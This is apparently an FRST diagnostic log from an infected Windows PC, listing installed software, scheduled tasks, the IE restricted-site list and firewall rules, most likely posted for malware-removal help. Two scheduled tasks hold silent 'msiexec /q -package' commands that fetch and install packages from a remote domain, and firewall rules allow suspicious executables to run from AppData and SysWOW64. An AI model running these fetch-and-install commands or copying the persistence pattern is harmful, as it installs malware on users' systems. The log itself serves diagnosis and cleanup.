Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{d98165f5-8b37-4100-8852-a0664374ff8a}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MKVToolNix 9.8.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 9.8.0 - Moritz Bunkus)
Mozilla Firefox 59.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 59.0.2 (x64 en-US)) (Version: 59.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 59.0.2.6656 - Mozilla)
NetTime (HKLM-x32\...\NetTime_is1) (Version: - Mark Griffiths)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0405-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Port Royale V1.4.0.2 (HKLM-x32\...\Port Royale_is1) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Samsung Easy Document Creator (HKLM-x32\...\Samsung Easy Document Creator) (Version: 1.06.60 (17.03.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.82.00(27.07.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.70.18.0 - Samsung Electronics Co., Ltd.)
Samsung OCR Software (HKLM-x32\...\Samsung OCR Software) (Version: 1.01.10 (20.06.2014) - Samsung Electronics Co., Ltd.)
Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.0.17 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.25 - Samsung Electronics Co., Ltd.) Hidden
Samsung SCX-3400 Series (HKLM-x32\...\Samsung SCX-3400 Series) (Version: 1.29 (09.09.2015) - Samsung Electronics Co., Ltd.)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.)
Skype verze 8.33 (HKLM-x32\...\Skype_is1) (Version: 8.33 - Skype Technologies S.A.)
SMPlayer 17.1.0 (x64) (HKLM\...\SMPlayer) (Version: 17.1.0 - Ricardo Villalba)
SNS Upload for Easy Document Creator (HKLM-x32\...\{B6B5F07C-88D5-49D3-A1A7-A6D4BC37DCCC}) (Version: 1.0.0 - Samsung Electronics Co.,Ltd)
SoftPerfect WiFi Guard version 2.0.2 (HKLM\...\{38AFD787-4D2E-4442-92D2-7739F5F92CF4}_is1) (Version: 2.0.2 - SoftPerfect)
South Park The Fractured But Whole version 1.0 (HKLM\...\South Park The Fractured But Whole_is1) (Version: 1.0 - CODEPUNKS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.2.1.8 - Synaptics Incorporated)
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version: - )
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-195099987-321758953-278711717-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2015-08-04] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-05-18] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
Task: {0E14317D-2102-48FC-AAB8-68A9D0B3F691} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {106A7FD6-C7D6-418B-AF21-09A77484159A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {16447E2A-F695-419E-8243-9BF676ECAD36} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {2208097B-6069-4E4E-B34D-B6C6499D266E} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-195099987-321758953-278711717-1001 => C:\Users\ulol\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {23D45486-6328-445F-8E32-ADBAA1F22487} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {2BEBB49D-B57F-4F93-8080-66415D045BD2} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {598F7A69-A348-4C5E-A5CA-F3A37912C800} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-12-21] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6A20F2C7-5CF8-4654-BAC1-A87B26620985} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-02-26] (Advanced Micro Devices, Inc.)
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {7F911834-FCA6-409C-A3A1-BBEFD2BE1E88} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {90DD05AC-EC80-4EB1-B27B-C21214053600} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {A5DAA59E-7902-47D5-B0FC-63D446828035} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {AD4942CE-F2AB-45E9-A0F7-A0A0696AF497} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {C51D1053-58AD-40DC-8AD7-42F044919F19} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {C8ED55E2-B8FB-4DD4-8E05-EB726C93E126} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {D643AA16-031E-4AF0-9CA3-98406A054B0E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2019-01-10 17:53 - 2018-11-15 11:01 - 002712432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-12 09:01 - 2018-11-09 03:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-12-14 19:16 - 2018-12-14 19:21 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 000015872 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 007562752 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7865 more sites.

IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123simsen.com -> www.123simsen.com

There are 7865 more sites.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-195099987-321758953-278711717-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ulol\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{680A3119-9C48-4A9D-8F3E-DCBBF626867E}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{9CD32ACD-CFD6-45A4-B4DF-C9EF3A4052CB}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{0C967B64-CE0C-456C-B174-8178F48D6104}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [TCP Query User{D803BB9E-7542-4BAA-920B-DAA1792A535A}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [{74BBCAA8-0F85-4E7C-AB86-EBFEFC54D83F}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{EF7CD7A6-B6AD-4289-952D-49D310DF7E02}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{1F3F6959-FCD3-404A-95E2-17B36DCB540F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3B79ECD1-9CEC-4E00-B545-A2262DDC26BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [UDP Query User{6C071EF6-C6C0-4D88-B919-ACD84451EF09}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [TCP Query User{01339B68-9EF4-4C99-8E75-3C99DCBE8EF1}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{418D3690-1654-4D36-9C65-E4881416F186}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{FD052E8D-5947-4005-9113-A4B0DA632966}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{865BC1B9-BDE3-408E-923A-336E538AB506}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2AC8C8A2-451C-4D9E-935F-4999B88AF985}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2BA6C829-EF73-4535-A7F7-CA54E9CB4E93}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{2221AC8E-0468-49A9-A0AE-489AC315ADF2}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{BA30716E-B3D5-4765-BFD4-2BFAB06F3A6E}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{C5027FDD-ABB1-4575-9FEB-30CEF15A0174}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{44620DE5-6297-4A22-853E-0F6BE8BC6C95}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{0125CC0F-2664-4DDC-8773-036A1480E45E}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{10FEC841-DB04-4EC4-B51B-926818D78CEF}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{1B2BD275-5E88-4056-97F9-B9F00CEF4644}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{DE602CDB-BEB2-49D6-8108-72A718061FA8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{8D7B0C18-C2F1-4044-924F-CB7ABE7F31C5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{65B2ED45-5E31-4CC1-92C6-8038109E3170}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{8AB3011A-5645-45FF-A547-B893F1D2B6BF}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{B4F4E17F-C2EF-4854-AD4C-8B2708E8AC1F}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{6FA07099-4EA9-452A-9FA8-995B59ECAE90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{AC472FF0-E9BA-477F-8C59-E0CF6E26B1F6}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{29EB2B2E-4FA2-4FA9-ADB8-FB3EA85EE2C0}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{1B152717-C9E6-4543-87BB-5D4E311A0B0F}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [{100C66FD-2DCC-4B01-8D14-02FFD2C069A9}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [UDP Query User{632511C2-DDFC-4CEF-8C55-A82E8EB56B2A}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{809F3FAE-2B59-440B-8219-81CB5996542E}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{58ECFD65-9A3C-47BA-AB19-B2A27BACEC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3E457CE4-B263-445B-916E-10B85CEBE320}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [UDP Query User{80F90ED6-45B2-4117-84CF-FBCBE2F06D08}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{5DAE795F-7DD0-4F03-A957-23178027EC7F}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{76359A4C-3A58-4EE1-A908-4ADE16275DBF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0FF7A781-7AB7-4397-B417-0E5504F6C62C}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [UDP Query User{946CEECC-8221-41F2-AF67-5BF9A2797A88}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{C8A027E8-6DAB-4F49-9015-1E2037DE8C23}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{DFF9485B-1726-4727-ACCD-1E22F49A5F76}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0516401-11A3-4DCC-A5CB-691CF7FA910D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A8991BE6-8068-4C4F-8482-08861EAF061C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3144E693-40E1-40BA-AD59-C5B0752F98E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DE99C12C-1421-4D07-B3C1-5D2D854A4EFD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{76B4001E-0ACD-45A3-A91A-18D739417786}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{80E9FEE1-E9D6-415C-9E57-42C9395DCACF}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{420EDF67-B57A-4B23-B6AF-93ACAC9F0A06}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{5429A441-852D-4C25-B0E9-E8FCDF25881D}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{36A60251-4723-4B9D-95BF-290C0B9D73F2}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{F0DBA328-0448-42C9-81D0-3B92A1739F2E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{FCDD228F-1357-42C4-A39B-A63F1B07F474}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [UDP Query User{6D3942CA-B064-4120-BD2B-6B02B318653B}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [{BF4317CC-2B83-4958-8B97-1061A97E93EE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{BD7AE586-6CAC-4892-B735-4CA80B0D3D62}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{8C18F3D0-FC27-424D-B0B3-02980A9FA42C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4D7D2769-DF79-481A-9CBF-F959AED5BC99}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{35A3D09F-CE17-4CA2-94B6-F4247ED5F3EC}] => (Allow) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
FirewallRules: [{226B719A-7399-44FC-8195-1ECE66B04A97}] => (Allow) C:\WINDOWS\SysWOW64\xeAwY.exe
FirewallRules: [{B89F5B34-5FB4-44EA-80BB-D163442646A0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
